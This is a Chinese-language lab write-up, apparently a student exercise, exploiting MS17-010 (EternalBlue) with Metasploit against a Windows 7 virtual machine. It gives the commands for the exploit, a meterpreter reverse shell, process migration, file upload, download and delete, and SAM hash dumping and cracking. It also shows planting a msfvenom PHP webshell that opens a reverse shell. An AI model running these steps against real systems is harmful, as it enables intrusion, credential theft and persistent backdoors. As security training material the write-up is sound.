标签：shell 命令 如下 010 漏洞 MS17 所示 输入

MS17-010漏洞利用

1.安装虚拟机win7 x64，实现利用ms17-010实现对其win7 x64主机开始渗透，查看该主机信息，打开远程桌面，抓取用户名和密码并破译，创建一个 : 学号.txt文件，实现上传，下载，删除。

首先启动win7 x64虚拟机，查看IP地址为192.168.70.139，如下如图所示：

在win7 x64上搭建wamp网站服务器从上到下依次安装软件，如下如所示：

安装成功后通过浏览器访问192.168.70.139查看是否能正常访问该网站，如下图所示：

Ms17-010漏洞的利用

接下来打开kali实现利用ms17-010漏洞，实现对其win7 x64主机进行渗透，首先使用scanner下扫描模块扫描目标主机是否存在ms17-010的漏洞，如下图所示：
在kali中输入以下命令：

命令：msfconsole

命令：search ms17-010

>use auxiliary/scanner/smb/smb_ms17-010
>set RHOSTS 192.168.70.139
>run

确认目标机器的操作系统及存在漏洞之后便可以进行漏洞攻击了，输入命令use exploit/windows/smb/ms17_010_eternalblue，调用exploit下的ms17_010_eternalblue模块，并输入命令show payloads 查看可用的payload，如下图所示：

输入命令set payload windows/x64/meterpreter/reverse_tcp设置payload，并输入命令show options查看参数配置，如下图所示，需要配置的参数为RHOST和LHOST

输入命令set RHOST 192.168.70.139 配置目标机器的IP地址，输入命令set LHOST 192.168.70.134 配置kali本地的IP地址，配置完成后输入命令show options检查参数，如下图所示：

参数配置检查无误后，输入命令run开始攻击，并且返回一个meterptrter会话说明已经攻击成功了，如下图所示：

后渗透攻击：信息收集

进程迁移：例如攻击者利用浏览器漏洞攻陷了目标主机，但攻击渗透后的浏览器有可能被用户关闭，此shell是非常脆弱的，所以获取shell后的第一步就是移动这个shell，将它和目标主机中一个稳定的进程绑定在一起。

例如：输入ps命令获取目标主机正在运行的进程，如下图所示：

输入命令getpid查看meterperter shell的进程号为2280，如下图所示：

我们可用使用自动迁移进程命令，系统会自动寻找合适的进程然后进行迁移，输入自动迁移命令run post/windows/manage/migrate,执行命令后此时将原先的2280进程号修改为1244，如图所示：

收集系统信息：获取了稳定进程之后开始收集系统信息，输入命令sysinfo查看目标主机的系统信息，如下图所示：

捕获桌面输入命令screenshot抓取目标主机的屏幕截图路径为/root/bPgQxuoB,jpeg文件,如下图所示：

输入shell命令进入目标机器shell，如下图所示：

在shell输入exit可用停止shell会话并返回meterperter中，如下图所示：

上传文件命令upload，在kali虚拟机root目录下存在70zsz.txt文件，其内容为I‘m is 70 zsz!，输入命令upload /root/70zsz.txt c:\\,此文件上传到目标机器c:\目录下，如下图所示：

输入shell进入Windows shell查看从c:\目录下是否有刚刚我们上传的70zsz.txt文件，如下图所示：

下载文件命令download，输入命令download c:\70zsz.txt/root/download将目标机器c:\下的70zsz.txt下载到本机/root/download中，如下图所示：

输入命令rm c:\\70zsz.txt 将目标机器c:\下的70zsz.txt删除，如下图所示：

后渗透攻击：Hash攻击

使用Hashdump抓取密码，HashdumpMeterpreter脚本可用从目标机器中提取Hash值，破解Hash值可获得登录密码。计算机中的每个账号的用户名和密码都存储在sam中，当计算机运行时，该文件对所有账号进行锁定，想要访问就必须有“系统级“的账号。

在meterpreter shell提示符下输入hashdump命令，将导出sam数据库中Hash，如下图所示：

从图中我们可用看出，返回了三个用户账号，分别为Administrator,Guest,zsz,数据输出的格式为用户名：SID:LM哈希：NTLM哈希:::，在zsz账户中NTLM哈希进行破解，使用在线破解网站对其进行破解，如https://www.cmd5.com/，可以看到结果正是为zsz账户的密码：123456

后渗透攻击：后门

Meterpreter后门：在Meterpreter中，有一个名为PGP Meterpreter的payload，利用这个模块可创建具有Meterpreter功能的PHP WebShell，在攻击中使用Metasploit PHP Shell步骤如下：
1.使用msfvenom创建一个webshell.php

2.上传webshell.php到目标服务器

3.运行Metasploit multi-handler开始监听

4.访问webshell.php页面

5.获得反弹Metasploit shell

首先通过Metasploit的msfvenom攻击制作PHP Meterpreter，输入命令msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.134 -f raw > 070zsz.php，如下图所示：

因为目标主机使用了wampserver，因此得知需要上传070zsz.php文件至目标主机中c:\wamp64\www中，如下图所示：

输入exit返回meterpreter，使用上传命令upload/root/070zsz.php c:\\wamp64\\www中，如下图所示：

输入exit回到msf，输入如下命令设置监听，如下图所示：

>exit
>use exploit/multi/handler
>set payload php/meterpreter/reverse_tcp
>set LHOST 192.168.70.134
>run

打开浏览器，访问目标机器服务器中070zsz.php文件，即访问http://192.168.70.139/070zsz.php ，结果可以看到服务端反弹shell成功如下图所示：

标签：shell,命令,如下,010,漏洞,MS17,所示,输入
来源： https://www.cnblogs.com/zovt/p/15590444.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。